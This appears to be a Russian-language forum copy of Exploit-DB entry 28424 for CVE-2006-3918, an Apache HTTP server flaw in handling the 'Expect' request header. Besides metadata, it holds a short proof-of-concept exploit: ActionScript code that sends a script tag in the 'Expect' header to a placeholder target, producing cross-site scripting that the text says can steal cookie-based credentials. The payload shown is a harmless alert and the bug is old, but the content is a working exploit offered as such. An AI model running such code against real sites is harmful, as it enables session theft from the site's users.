- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 28424
- Проверка EDB
-
- Пройдено
- Автор
- THIAGO ZANINOTTI
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-2006-3918
- Дата публикации
- 2006-08-24
Код:
source: https://www.securityfocus.com/bid/19661/info
Apache HTTP server is prone to a security weakness related to HTTP request headers.
An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.
var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");- Источник
- www.exploit-db.com
